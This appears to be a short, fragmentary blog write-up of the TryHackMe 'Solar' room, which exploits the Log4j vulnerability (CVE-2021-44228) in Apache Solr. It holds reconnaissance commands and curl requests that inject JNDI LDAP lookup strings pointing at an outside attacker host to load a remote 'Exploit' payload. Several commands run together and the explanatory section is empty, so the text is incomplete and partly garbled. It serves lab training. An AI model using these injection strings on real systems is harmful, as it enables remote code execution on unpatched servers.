Exploiting Log4j Vulnerability (CVE-2021–44228) — TryHackMe “Solar” Room Write-up

 

What Is Log4J Vulnerability?

Try Hack Me Walkthrough:


└─$ nmap solar.thm -p- -sC -sV
Apache Solr

└─$ firefox http://solar.thm:8983
/var/solr/logs
solr.log
/admin/cores
params
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'
Listening on 0.0.0.0:1389curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'python3 -m http.server
/etc/default/solr.in.sh

Post a Comment

Previous Post Next Post